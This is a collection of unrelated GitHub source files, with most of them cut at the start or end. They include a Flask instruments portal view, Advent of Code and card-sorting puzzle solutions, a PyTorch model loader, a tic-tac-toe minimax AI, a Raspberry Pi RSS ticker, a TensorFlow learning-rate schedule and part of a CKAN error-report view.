flask_login import current_user\nimport urllib2, json\n\nfrom lw_daap.modules.instruments.models import Instrument\nfrom lw_daap.modules.instruments.forms import SearchForm, InstrumentForm\nfrom lw_daap.modules.instruments.pagination import Pagination\n\nfrom werkzeug import MultiDict\nfrom array import *\n\nblueprint = Blueprint(\n 'lwdaap_instruments',\n __name__,\n url_prefix=\"/instruments\",\n static_folder=\"static\",\n template_folder=\"templates\",\n)\n@blueprint.route('/', methods=['GET', ])\n@register_menu(blueprint, 'main.instruments', _('Instruments'), order=3)\n@register_breadcrumb(blueprint, '.', _('Instruments'))\n@wash_arguments({'p': (unicode, ''),\n 'so': (unicode, ''),\n 'page': (int, 1),\n })\ndef index(p, so, page):\n page = max(page, 1)\n per_page = cfg.get('INSTRUMENTS_DISPLAYED_PER_PAGE', 9)\n\n instruments = getPaginatedInstrumentsByIdUser(current_user['id'],p, page, per_page)\n count = getCountInstrumentsByIdUser(current_user['id'],p)\n instruments_json = json.loads(instruments)\n\n form = SearchForm()\n\n my_array = [None] * 0\n for instrument in instruments_json:\n i = Instrument.from_json(instrument)\n my_array.append(i)\n\n pagination = Pagination(page, per_page, count)\n\n ctx = dict(\n instruments=my_array,\n form=form,\n page=page,\n per_page=per_page,\n pagination = pagination,\n )\n\n return render_template(\n \"instruments/index.html\",\n **ctx\n )\n\n@blueprint.route('/new/', methods=['GET', 'POST'])\n@ssl_required\n@login_required\n@register_breadcrumb(blueprint, '.new', _('Create new'))\ndef new():\n uid = current_user.get_id()\n form = InstrumentForm(request.values, crsf_enabled=False)\n\n ctx = {\n 'form': form,\n 'is_new': True,\n 'instruments': None,\n }\n\n if request.method == 'POST' and form.validate():\n data = form.data\n\n # Extract access_groups from Instrument data\n access_groups = data['access_groups']\n del data['access_groups']\n\n # Depends on the access right selected, clean some instrument fields\n i = Instrument(user_id=uid, **data)\n if i.access_right == \"open\":\n i.access_conditions = \"\"\n i.embargo_date = \"\"\n elif i.access_right == \"embargoed\":\n i.access_conditions = \"\"\n elif i.access_right == \"restricted\":\n i.embargo_date = \"\"\n i.license = \"\"\n else:\n i.access_conditions = \"\"\n i.embargo_date = \"\"\n i.license = \"\"\n\n db.session.commit()\n\n # Check if logged user has configured the profile BD fields\n userInfo = getUserInfoByPortalUser(current_user['nickname'])\n userInfoJson = json.loads(userInfo)\n if userInfoJson['databaseUser']:\n # If already exists an instrument with the chosen name: show an error message\n # Else: Save instrument data\n try:\n instrumentWithSameName = findInstrumentByName(i.name)\n flash(\"Already exists an instrument with the same name. Please choose another name.\", category='error')\n except Exception as e:\n instrument = createInstrument(i.name, i.embargo_date, i.access_right, i.user_id, i.license, i.access_conditions, userInfoJson['databaseUser'], current_user['nickname'])\n jsonInstrument = json.loads(instrument)\n if (jsonInstrument['idInstrument']) >= 0:\n i.id = int(jsonInstrument['idInstrument'])\n if i.access_right == 'restricted':\n for group in access_groups:\n try:\n addPermissionGroup(i.name, group['identifier'])\n except Exception as e:\n flash(\"There was an error. 
Please, contact with the Lifewatch site administrator.\", category='error')\n                    flash(\"Instrument was successfully created.\", category='success')\n                    return redirect(url_for('.show', instrument_id=i.id))\n                else:\n                    flash(\"There was an error. Please, contact with the Lifewatch site administrator.\", category='error')\n        else:\n            flash(\"The database user doesn't exist. Please update your profile before registering an instrument.\", category='error')\n\n\n    return render_template(\"instruments/new.html\", **ctx)\n\n\n@blueprint.route('/<int:instrument_id>/show/', methods=['GET', 'POST'])\n@register_breadcrumb(blueprint, '.show', 'Show')\n@wash_arguments({'page': (int, 1)})\ndef show(instrument_id, page):\n    instrument = Instrument.query.get_or_404(instrument_id)\n\n    dbuser = getDBPublicUser(instrument_id)\n    dbpass = getDBPublicPass(instrument_id)\n    tablename = \"INST_CONTENT_\" + instrument.name\n    db_url = getDBUrl()\n\n    tabs = {\n        'public': {\n            'template': 'instruments/show.html',\n            'q': {'public': True},\n        }\n    }\n\n    try:\n        tab_info = tabs['public']\n    except KeyError:\n        abort(404)\n    query_opts = tab_info.get('q', {})\n    records = instrument.get_instrument_records(**query_opts)\n    page = max(page, 1)\n    per_page = cfg.get('RECORDS_IN_INSTRUMENTS_DISPLAYED_PER_PAGE', 5)\n    records = records.paginate(page, per_page=per_page)\n\n    template = tab_info.get('template')\n\n    ctx = dict(\n        instrument=instrument,\n        records=records,\n        tablename=tablename.upper(),\n        dbuser=dbuser,\n        dbpass=dbpass,\n        dburl=db_url,\n        format_record=format_record,\n        page=page,\n        per_page=per_page,\n    )\n\n    return render_template(template, **ctx)\n\n@blueprint.route('/save/', methods=['POST', 'GET'])\n@login_required\ndef save():\n    is_submit = request.args.get('submit') == '1'\n    is_complete_form = request.args.get('all') == '1'\n\n\n    if request.method != 'POST':\n        abort(400)\n\n    data = request.json or MultiDict({})\n\n    if 'access_groups' in data:\n        del data['access_groups']\n    uid = current_user.get_id()\n\n    instrument = Instrument(user_id=uid, **data)\n    dummy_form, validated, result = instrument.process(\n        data, complete_form=is_complete_form or is_submit\n    )\n\n    # if validated and is_submit:\n    #     instrument.complete()\n\n    try:\n        return jsonify(result)\n    except TypeError:\n        return jsonify(None)\n\n\n\n@blueprint.route(\n    '/save/<field_name>/',\n    methods=['GET', 'POST'])\n@login_required\ndef autocomplete(field_name=None):\n    \"\"\"Auto-complete a form field.\"\"\"\n    term = request.args.get('term')  # value\n    limit = request.args.get('limit', 50, type=int)\n\n    form = InstrumentForm(request.values, crsf_enabled=False)\n    result = form.autocomplete(field_name, term, limit=limit)\n    result = result if result is not None else []\n\n    # jsonify doesn't return lists as top-level items.\n    resp = make_response(\n        json.dumps(result, indent=None if request.is_xhr else 2)\n    )\n    resp.mimetype = \"application/json\"\n    return resp\n","repo_name":"aeonium/lw-daap","sub_path":"lw_daap/modules/instruments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"19686148204","text":"coordinate_area_size = dict()\narea_map = dict()\narea_key = dict()\nmax_x = 0\nmax_y = 0\nmin_x = 9999\nmin_y = 9999\n\n\ndef get_manhattan_distance(coord1, coord2):\n    return abs(coord1[0] - coord2[0]) + abs(coord1[1] - coord2[1])\n\n\ndef get_closest(this_x, this_y):\n    # print(\"checking neighbors for {}, {}\", this_x, this_y)\n    if (this_x, this_y) in coordinate_area_size:\n        # 
print(\"found\")\n        return this_x, this_y\n    step = 1\n    while True:\n        found_in_this_step = list()\n        current_x, current_y = this_x, this_y + step\n        # move to left\n        while current_y > this_y:\n            # print(\"checking {}, {}\".format(x,y))\n            if (current_x, current_y) in coordinate_area_size:\n                found_in_this_step.append((current_x, current_y))\n            current_x -= 1\n            current_y -= 1\n        while current_x < this_x:\n            # print(\"checking {}, {}\".format(x,y))\n            if (current_x, current_y) in coordinate_area_size:\n                found_in_this_step.append((current_x, current_y))\n            current_x += 1\n            current_y -= 1\n        while current_y < this_y:\n            # print(\"checking {}, {}\".format(x,y))\n            if (current_x, current_y) in coordinate_area_size:\n                found_in_this_step.append((current_x, current_y))\n            current_x += 1\n            current_y += 1\n        while current_x > this_x:\n            # print(\"checking {}, {}\".format(x,y))\n            if (current_x, current_y) in coordinate_area_size:\n                found_in_this_step.append((current_x, current_y))\n            current_x -= 1\n            current_y += 1\n\n        if len(found_in_this_step) == 1:\n            return found_in_this_step[0]\n        if len(found_in_this_step) > 1:\n            return None\n        step += 1\n\n\nwith open(\"input1.txt\") as file:\n    for i, row in enumerate(file):\n        x = int(row.split(\",\")[0].strip())\n        y = int(row.split(\",\")[1].strip())\n        if x > max_x:\n            max_x = x\n        if y > max_y:\n            max_y = y\n        if x < min_x:\n            min_x = x\n        if y < min_y:\n            min_y = y\n        coordinate_area_size[(x, y)] = 0\n\n# part 1\nfor x in range(min_x, max_x):\n    for y in range(min_y, max_y):\n        closest = get_closest(x, y)\n        if closest is not None:\n            coordinate_area_size[closest] += 1\n\n# for the simplest approximation, just check that these areas don't extend past 100 in any direction\ncleaned_areas = dict()\nfor key, value in coordinate_area_size.items():\n    if get_closest(key[0]+100, key[1]) != key and get_closest(key[0]-100, key[1]) != key and get_closest(key[0], key[1]+100) != key and get_closest(key[0], key[1]-100) != key:\n        cleaned_areas[key] = value\n\nprint(cleaned_areas[max(cleaned_areas, key=cleaned_areas.get)])\n\n\n# part 2\n\nacceptable_locations = 0\n\nfor x in range(min_x, max_x):\n    for y in range(min_y, max_y):\n        total_distance = 0\n        for coordinate in coordinate_area_size.keys():\n            total_distance += get_manhattan_distance((x, y), coordinate)\n            if total_distance >= 10000:\n                break\n        if total_distance < 10000:\n            acceptable_locations += 1\n\nprint(acceptable_locations)\n","repo_name":"mkolas/advent2018","sub_path":"06/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5282155846","text":"import glog as log\nimport os.path as osp\nimport h5py\nimport numpy as np\nimport torch\nimport models.cifar\nimport models.imagenet\n\n\ndef load_weight_from_pth_checkpoint(model, fname):\n    log.info('Load weights from {}'.format(fname))\n    raw_state_dict = torch.load(fname, map_location='cpu')['state_dict']\n    state_dict = dict()\n    for key, val in raw_state_dict.items():\n        new_key = key.replace('module.', '')\n        state_dict[new_key] = val\n\n    model.load_state_dict(state_dict)\n\n\ndef make_model(dataset, arch, **kwargs):\n    \"\"\"\n    Make model, and load pre-trained weights.\n    :param dataset: cifar10 or imagenet\n    :param arch: arch name, e.g., alexnet_bn\n    :return: model (in cpu and training mode)\n    \"\"\"\n    assert dataset in ['cifar10', 'imagenet']\n    if dataset == 'cifar10':\n        if arch == 'gdas':\n            assert kwargs['train_data'] == 'full'\n            model = 
models.cifar.gdas('data/cifar10-models/gdas/seed-6293/checkpoint-cifar10-model.pth')\n model.mean = [125.3 / 255, 123.0 / 255, 113.9 / 255]\n model.std = [63.0 / 255, 62.1 / 255, 66.7 / 255]\n model.input_space = 'RGB'\n model.input_range = [0, 1]\n model.input_size = [3, 32, 32]\n elif arch == 'pyramidnet272':\n assert kwargs['train_data'] == 'full'\n model = models.cifar.pyramidnet272(num_classes=10)\n load_weight_from_pth_checkpoint(model, 'data/cifar10-models/pyramidnet272/checkpoint.pth')\n model.mean = [0.49139968, 0.48215841, 0.44653091]\n model.std = [0.24703223, 0.24348513, 0.26158784]\n model.input_space = 'RGB'\n model.input_range = [0, 1]\n model.input_size = [3, 32, 32]\n else:\n # decide weight filename prefix, suffix\n if kwargs['train_data'] in ['cifar10.1']:\n # use cifar10.1 (2,000 images) to train models\n if kwargs['train_data'] == 'cifar10.1':\n prefix = 'data/cifar10.1-models'\n else:\n raise NotImplementedError('Unknown train data {}'.format(kwargs['train_data']))\n if kwargs['epoch'] == 'final':\n suffix = 'final.pth'\n elif kwargs['epoch'] == 'best':\n suffix = 'model_best.pth'\n else:\n raise NotImplementedError('Unknown epoch {} for train data {}'.format(\n kwargs['epoch'], kwargs['train_data']))\n elif kwargs['train_data'] == 'full':\n # use full training set to train models\n prefix = 'data/cifar10-models'\n if kwargs['epoch'] == 'final':\n suffix = 'checkpoint.pth.tar'\n elif kwargs['epoch'] == 'best':\n suffix = 'model_best.pth.tar'\n else:\n raise NotImplementedError('Unknown epoch {} for train data {}'.format(\n kwargs['epoch'], kwargs['train_data']))\n else:\n raise NotImplementedError('Unknown train data {}'.format(kwargs['train_data']))\n\n if arch == 'alexnet_bn':\n model = models.cifar.alexnet_bn(num_classes=10)\n elif arch == 'vgg11_bn':\n model = models.cifar.vgg11_bn(num_classes=10)\n elif arch == 'vgg13_bn':\n model = models.cifar.vgg13_bn(num_classes=10)\n elif arch == 'vgg16_bn':\n model = models.cifar.vgg16_bn(num_classes=10)\n elif arch == 'vgg19_bn':\n model = models.cifar.vgg19_bn(num_classes=10)\n elif arch == 'wrn-28-10-drop':\n model = models.cifar.wrn(depth=28, widen_factor=10, dropRate=0.3, num_classes=10)\n else:\n raise NotImplementedError('Unknown arch {}'.format(arch))\n\n # load weight\n load_weight_from_pth_checkpoint(model, osp.join(prefix, arch, suffix))\n\n # assign meta info\n model.mean = [0.4914, 0.4822, 0.4465]\n model.std = [0.2023, 0.1994, 0.2010]\n model.input_space = 'RGB'\n model.input_range = [0, 1]\n model.input_size = [3, 32, 32]\n\n elif dataset == 'imagenet':\n\n model = eval('models.imagenet.{}(num_classes=1000, pretrained=\\'imagenet\\')'.format(arch))\n\n if kwargs['train_data'] == 'full':\n # torchvision has load correct checkpoint automatically\n pass\n elif kwargs['train_data'] == 'imagenetv2-val':\n prefix = 'data/imagenetv2-v1val45000-models'\n if kwargs['epoch'] == 'final':\n suffix = 'checkpoint.pth.tar'\n elif kwargs['epoch'] == 'best':\n suffix = 'model_best.pth.tar'\n else:\n raise NotImplementedError('Unknown epoch {} for train data {}'.format(\n kwargs['epoch'], kwargs['train_data']))\n\n # load weight\n load_weight_from_pth_checkpoint(model, osp.join(prefix, arch, suffix))\n else:\n raise NotImplementedError('Unknown train data {}'.format(kwargs['train_data']))\n else:\n raise NotImplementedError('Unknown dataset {}'.format(dataset))\n\n return 
model\n","repo_name":"ZiangYan/subspace-attack.pytorch","sub_path":"models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"33519373682","text":"\"\"\"\nFunctions and other code belonging to the solo game mode\n\"\"\"\nimport random\n\n# AI difficult mode\ndef ai_mode(table, players_avatar):\n    global scores\n    player1 = players_avatar[0]\n    player2 = players_avatar[1]\n    bestScore = float('-inf') # negative infinity\n    move = []\n    for l in range(3):\n        for c in range(3):\n            # Is the spot available?\n            if (table[l][c] == 0):\n                table[l][c] = player2\n                score = minimax(table, players_avatar, 0, False)\n                #score = 1\n                table[l][c] = 0\n                if score > bestScore:\n                    bestScore = score\n                    move = [l, c]\n\n    return move\n\n# x, o , tie\nglobal scores\n#scores = {'x': -1, 'o': 1, 'tie': 0}\n\ndef set_scores(players_avatar):\n    global scores\n    scores = {players_avatar[0]: -1, players_avatar[1]: 1, 'tie': 0}\n\n# Minimax AI function, to cycle all possibilities\ndef minimax(table, players_avatar, depth, isMaximizing):\n    result = ai_winner(table)\n    global scores\n\n    if result != None:\n        return scores[result]\n\n    player1 = players_avatar[0]\n    player2 = players_avatar[1]\n\n    if isMaximizing:\n        bestScore = float('-inf') # negative infinity\n        for l in range(3):\n            for c in range(3):\n                # Is the spot available?\n                if table[l][c] == 0:\n                    table[l][c] = player2 # AI\n                    score = minimax(table, players_avatar, depth + 1, False) # call minimax recursively\n                    table[l][c] = 0\n                    bestScore = max(score, bestScore) # find the best spot\n\n        return bestScore # return the best spot\n    else:\n        bestScore = float('inf') # positive infinity\n        for l in range(3):\n            for c in range(3):\n                # Is the spot available?\n                if table[l][c] == 0:\n                    table[l][c] = player1\n                    score = minimax(table, players_avatar, depth + 1, True) # call minimax recursively\n                    table[l][c] = 0\n                    bestScore = min(score, bestScore) # find the best spot\n\n        return bestScore # return the best spot\n\ndef ai_winner(table):\n    winner = None\n    global scores\n\n    # horizontal\n    for l in range(3):\n        if (table[l][0] == table[l][1] == table[l][2]) and table[l][0] != 0:\n            winner = table[l][0]\n\n    # Vertical\n    for c in range(3):\n        if (table[0][c] == table[1][c] == table[2][c]) and table[0][c] != 0:\n            winner = table[0][c]\n\n    # Diagonal\n    if (table[0][0] == table[1][1] == table[2][2]) and table[0][0] != 0:\n        winner = table[0][0]\n\n    if (table[2][0] == table[1][1] == table[0][2]) and table[2][0] != 0:\n        winner = table[2][0]\n\n    openSpots = 0\n    for l in range(3):\n        for c in range(3):\n            if (table[l][c] == 0):\n                openSpots += 1\n\n    if (winner == None and openSpots == 0):\n        return 'tie'\n    else:\n        return winner\n\n# AI easy mode\n# Chooses random values and checks if the spots are not taken,\n# if they are, it will recursively try to find a free spot\ndef easy_mode(table):\n    if not free_spaces(table): return None # guarantee that there are free spots,\n                                           # in order not to have an infinite loop\n    pos_x = random.randint(0,2) # 0 to 2\n    pos_y = random.randint(0,2) # 0 to 2\n\n    # print(f\"easy_pos: {pos_x}-{pos_y}\") DEBUG\n\n    if table[pos_x][pos_y] == 0:\n        return [pos_x, pos_y]\n    return easy_mode(table) # recursive call\n\n# check for free spaces on the table\ndef free_spaces(table):\n    for line in table:\n        for column in line:\n            if column == 0: return True\n    return 
False\n","repo_name":"TheGoncaloSilva/tic_tac_toe_app_improved","sub_path":"src/pages/solo.py","file_name":"solo.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11637046722","text":"#!/usr/bin/python\n\"\"\"\nRSSFeed-Multi.py\nAuthor : Martin Coleman with major contributions by Raspberry Pi forum user ghp\nCreation Date : 03/03/2022\n\nFree and open for all to use. But put credit where credit is due.\n\nUse the rocker switch to flip between feeds, button 4 (the one on it's own) will shutdown.\n\nIn this version the RSS feeds are read in from /boot/rss-feeds.txt , this enables feeds to\nbe added and removed on a Windoze machine \n\nOVERVIEW:-----------------------------------------------------------------------\nObtian data from an RSS feeds and display it on an LCD\n\"\"\"\n\nimport pifacecad\ntry:\n from lcdScroll import Scroller\nexcept ImportError:\n print (\"Please ensure lcdScroll.py is in the current directory\")\ntry: \n import feedparser\nexcept ImportError:\n print (\"The feedparser module is missing! Please run; sudo pip install feedparser and try again.\") \nimport sys\nimport threading\nimport time\nimport copy\nimport os\nimport ast\n\nwith open(\"/boot/rss-feeds.txt\", \"r\") as data:\n RSS_FEEDS = ast.literal_eval(data.read())\n\nclass RSSFeed(object):\n def __init__(self, feed_name, feed_url):\n self.feed_name = feed_name\n self.feed_url = feed_url\n\nclass FeedViewer:\n def __init__(self, cad):\n self.cad = cad\n self.cad.lcd.backlight_on()\n self.cad.lcd.blink_off()\n self.cad.lcd.cursor_off()\n\n def start(self, feed):\n self.current_feed = feed\n\n self.run = True\n self.stopped_event = threading.Event()\n\n self.thread_update = threading.Thread(target=self._update, name=\"update\")\n self.thread_update.start()\n\n def stop(self):\n self.run = False\n self.stopped_event.wait()\n self.stopped_event.clear()\n\n def terminate(self):\n cad.lcd.blink_off()\n cad.lcd.cursor_off()\n cad.lcd.backlight_off()\n cad.lcd.clear()\n\n def _update(self):\n \"\"\" running in a thread; rolling feeds to lcd\"\"\"\n speed_time = 0.01 # How fast to scroll the lcd\n current_position = 0\n rawfeed=feedparser.parse(self.current_feed.feed_url)\n self.cad.lcd.clear()\n\n while self.run:\n try:\n feed = rawfeed['entries'][current_position]['title']\n except Exception:\n # most possibly end of feed arrived\n current_position = 0\n continue\n\n title = self.current_feed.feed_name\n lines = [title,feed]\n\n # Create our scroller instance:\n scroller = Scroller(lines=lines)\n t_end = time.time() + 60 # How long to scroll each entry of the feed, in seconds.\n while time.time() < t_end:\n if not self.run: break\n #Get the updated scrolled lines, and display:\n message = scroller.scroll()\n self.cad.lcd.write(message)\n\n self._sleep(speed_time)\n\n current_position += 1\n self.stopped_event.set()\n\n def _sleep(self, t):\n \"\"\"a stoppable time.sleep()\"\"\"\n t_end = time.time() + t\n\n while time.time() < t_end:\n if not self.run: break\n time.sleep(0.05)\n\n# listener cannot deactivate itself so we have to wait until it has\n# finished using a threading.Barrier.\n# global end_barrier\nend_barrier = threading.Barrier(2)\n\nclass RSSController(object):\n def __init__(self, cad, feeds, feed_index=0):\n self.feeds = feeds\n self.feed_index = feed_index\n self.lock = threading.Lock()\n\n with self.lock:\n self.viewer = FeedViewer(cad)\n current_feed = copy.copy( self.feeds[self.feed_index] )\n 
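            # Illustrative note on the line above: the shallow copy gives the
            # viewer thread its own RSSFeed object, so the stop/restart cycle
            # triggered by a rocker-switch press never hands two threads the
            # same mutable instance. A minimal sketch of the same handoff
            # pattern (hypothetical names, not from this file):
            #   snapshot = copy.copy(items[index])   # worker owns snapshot
            #   threading.Thread(target=consume, args=(snapshot,)).start()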
self.viewer.start( current_feed)\n\n def next_feed(self, event=None):\n with self.lock:\n self.feed_index = (self.feed_index + 1) % len(self.feeds)\n self.viewer.stop()\n current_feed = copy.copy( self.feeds[self.feed_index] )\n self.viewer.start( current_feed)\n\n\n def previous_feed(self, event=None):\n with self.lock:\n self.feed_index = (self.feed_index - 1) % len(self.feeds)\n self.viewer.stop()\n current_feed = copy.copy( self.feeds[self.feed_index] )\n self.viewer.start( current_feed)\n\n def stop(self):\n with self.lock:\n self.viewer.stop()\n self.viewer.terminate()\n\n\nif __name__ == \"__main__\":\n\n feeds = \\\n [RSSFeed(s['feed_name'], s['url']) for s in RSS_FEEDS]\n\n cad = pifacecad.PiFaceCAD()\n\n # global rssdisplay\n rssdisplay = RSSController(cad, feeds)\n\n # wait for button presses\n switchlistener = pifacecad.SwitchEventListener(chip=cad)\n switchlistener.register(4, pifacecad.IODIR_ON, end_barrier.wait)\n switchlistener.register(6, pifacecad.IODIR_ON, rssdisplay.previous_feed)\n switchlistener.register(7, pifacecad.IODIR_ON, rssdisplay.next_feed)\n switchlistener.activate()\n\n end_barrier.wait() # wait unitl exit\n switchlistener.deactivate()\n rssdisplay.stop()\n cad.lcd.write(\"Shutdown In 5\")\n time.sleep(5)\n cad.lcd.clear()\n os.system(\"sudo shutdown -h now\")\n #sys.exit() # Uncomment this and comment the above to exit rather than shutdown.\n \n \n","repo_name":"Trotter73/RSS-Ticker","sub_path":"RSSFeed-Multi-Ext.py","file_name":"RSSFeed-Multi-Ext.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10170579962","text":"from typing import Any, Dict\n\nimport tensorflow as tf\n\nfrom tensorflow_similarity.types import FloatTensor\n\n\n@tf.keras.utils.register_keras_serializable(package=\"Similarity\")\nclass WarmUpCosine(tf.keras.optimizers.schedules.LearningRateSchedule):\n \"\"\"A LearningRateSchedule that uses a cosine decay schedule with a warmup period.\n\n This learning rate schedule is useful for training when using the Barlow Twin Loss.\n\n The warmup period applies a linear scaling to the CosineDecay schedule.\n \"\"\"\n\n def __init__(\n self,\n initial_learning_rate: float,\n decay_steps: int,\n warmup_steps: int,\n warmup_learning_rate: float = 0.0,\n alpha: float = 0.0,\n name: str = \"WarmUpCosine\",\n ):\n \"\"\"Applies cosine decay to the learning rate.\n\n Args:\n initial_learning_rate: A scalar `float32` or `float64` Tensor or a\n Python number. The initial learning rate.\n decay_steps: A scalar `int32` or `int64` `Tensor` or a Python number.\n Number of steps to decay over.\n warmup_steps: A scalar `int32` or `int64` `Tensor` or a Python number.\n Number of steps to warmup over. Must be smaller than the number of\n decay_steps.\n warmup_learning_rate: A scalar `float32` or `float64` Tensor or a\n Python number. The initial warmup learning rate. Must be smaller than\n the initial_learning_rate. Defaults to 0.0.\n alpha: A scalar `float32` or `float64` Tensor or a Python number.\n Minimum learning rate value as a fraction of initial_learning_rate.\n Defaults to 0.0.\n name: String. Optional name of the operation. 
Defaults to 'WarmUpCosine'.\n \"\"\"\n\n super().__init__()\n\n if warmup_learning_rate > initial_learning_rate:\n raise ValueError(\n \"warmup_learning_rate must be smaller than the initial_learning_rate\"\n )\n\n if warmup_steps > decay_steps:\n raise ValueError(\n \"warmup_steps must be smaller than the decay_steps\"\n )\n self.initial_learning_rate = initial_learning_rate\n self.decay_steps = decay_steps\n self.alpha = alpha\n self.warmup_learning_rate = warmup_learning_rate\n self.warmup_steps = warmup_steps\n self.name = name\n\n self.cosine_decay = tf.keras.optimizers.schedules.CosineDecay(\n initial_learning_rate=initial_learning_rate,\n decay_steps=decay_steps,\n alpha=alpha,\n )\n # Compute the warmup increment.\n self.tf_initial_learning_rate = tf.convert_to_tensor(\n self.initial_learning_rate, name=\"initial_learning_rate\"\n )\n self.dtype = self.tf_initial_learning_rate.dtype\n self.learning_rate_delta = tf.convert_to_tensor(\n self.warmup_learning_rate / self.initial_learning_rate, self.dtype\n )\n self.warmup_inc = tf.math.divide_no_nan(\n (1.0 - self.learning_rate_delta),\n tf.convert_to_tensor(self.warmup_steps, self.dtype),\n )\n\n # If the warmup increment is zero we have no warm up phase and we set\n # the learning rate delta to 1.0 to ensure the warmup_scaler value is\n # always fixed at 1.0.\n if self.warmup_inc == 0:\n self.learning_rate_delta = tf.constant([1.0], self.dtype)\n\n def __call__(self, step: FloatTensor) -> FloatTensor:\n global_step_recomp = tf.cast(step, self.dtype)\n warmup_scaler = tf.minimum(\n 1.0, self.warmup_inc * global_step_recomp + self.learning_rate_delta\n )\n learning_rate: FloatTensor = (\n self.cosine_decay(global_step_recomp) * warmup_scaler\n )\n return learning_rate\n\n def get_config(self) -> Dict[str, Any]:\n return {\n \"initial_learning_rate\": self.initial_learning_rate,\n \"decay_steps\": self.decay_steps,\n \"alpha\": self.alpha,\n \"warmup_learning_rate\": self.warmup_learning_rate,\n \"warmup_steps\": self.warmup_steps,\n \"name\": self.name,\n }\n","repo_name":"xjdlb/my-awesome-tensorlfow-tutorial","sub_path":"similarity-master/tensorflow_similarity/schedules.py","file_name":"schedules.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"32159075734","text":"from heapq import heappop, heappush\r\nimport sys\r\ninput = sys.stdin.readline\r\nn = int(input())\r\narr = []\r\nfor i in range(n):\r\n heappush(arr, int(input()))\r\nnew_arr = []\r\nanswer = 0\r\nif n == 1:\r\n print(0)\r\nelse:\r\n while arr:\r\n if len(arr) > 1:\r\n num = heappop(arr) + heappop(arr)\r\n answer += num\r\n heappush(arr, num)\r\n else:\r\n break\r\n print(answer)","repo_name":"wnsgml7267/cote-practice","sub_path":"백준/Gold/1715. 
카드 정렬하기/카드 정렬하기.py","file_name":"카드 정렬하기.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74044671271","text":"import json\nimport logging\nimport typing\nfrom functools import partial\nimport ckan.lib.navl.dictization_functions as dict_fns\nimport ckan.lib.helpers as h\nimport ckan.model\nfrom flask import Blueprint, redirect, request\nfrom flask.views import MethodView\nfrom ckan.views.home import CACHE_PARAMETERS\nfrom ckan.views.dataset import url_with_params\nfrom ckan.plugins import toolkit\nfrom ckan.logic import clean_dict, parse_params, tuplize_dict\n\nfrom ..helpers import get_status_labels\n\nlogger = logging.getLogger(__name__)\n\nerror_report_blueprint = Blueprint(\n \"error_report\", __name__, template_folder=\"templates\", url_prefix=\"/error_report\"\n)\n\n\n@error_report_blueprint.route(\"/\")\ndef get_error_reports():\n return _get_error_reports_list(\"error_report_list_public\", True)\n\n\n@error_report_blueprint.route(\"/rejected_error_reports\")\ndef get_error_reports_list():\n return _get_error_reports_list(\"error_report_list_public\")\n\n\n@error_report_blueprint.route(\"/my_error_reports\")\ndef get_my_error_reports():\n return _get_error_reports_list(\"my_error_report_list\", True)\n\n\n@error_report_blueprint.route(\"/submitted_error_reports\")\ndef get_submitted_error_reports():\n return _get_error_reports_list(\"submitted_error_report_list\", True)\n\n\ndef _request_url_(params_nopage, requests_type, q=None, page=None):\n params = list(params_nopage)\n params.append((\"page\", page))\n url = request.url_rule.rule\n\n return url_with_params(url, params)\n\n\ndef _get_error_reports_list(ckan_action: str, should_show_create_action: bool = False):\n try:\n error_reports = toolkit.get_action(ckan_action)(\n context={\n \"user\": toolkit.g.user,\n \"dictize_for_ui\": True,\n },\n data_dict={},\n )\n except toolkit.NotAuthorized:\n result = toolkit.abort(\n 403,\n toolkit._(\"Not authorized to list error reports\"),\n )\n\n else:\n params_nopage = [\n (k, v) for k, v in request.args.items(multi=True) if k != \"page\"\n ]\n params_nosort = [(k, v) for k, v in params_nopage]\n pager_url = partial(_request_url_, params_nosort, None)\n page = h.get_page_number(request.args)\n extra_vars = {\n \"error_reports\": error_reports,\n \"statuses\": get_status_labels(),\n \"show_create_button\": should_show_create_action,\n \"page\": h.Page(\n collection=error_reports,\n items_per_page=20,\n url=pager_url,\n page=page,\n item_count=len(error_reports),\n ),\n }\n result = toolkit.render(\"error_report/list.html\", extra_vars=extra_vars)\n return result\n\n\nclass ErrorReportCreateView(MethodView):\n def get(self, data=None, errors=None, error_summary=None):\n toolkit.check_access(\"error_report_create_auth\", {\"user\": toolkit.g.user})\n data_to_show = data or clean_dict(\n dict_fns.unflatten(\n tuplize_dict(parse_params(request.args, ignore_keys=CACHE_PARAMETERS))\n )\n )\n packages = ckan.model.Session.query(ckan.model.Package).all()\n\n metadata_records = [\n {\"value\": record.id, \"text\": record.title} for record in packages\n ]\n\n selected_metadata_record = request.args.get(\"metadata_record\", None)\n\n extra_vars = {\n \"form_snippet\": \"error_report/snippets/report_form.html\",\n \"enable_owner_fieldset\": True,\n \"enable_nsif_fieldset\": False,\n \"csi_reference_id\": None,\n \"data\": data_to_show,\n \"metadata_records\": metadata_records,\n 
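            # Note: "selected_record" below pre-selects the metadata picker
            # when this view is opened via a ?metadata_record=<id> link
            # (the value taken from request.args above).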
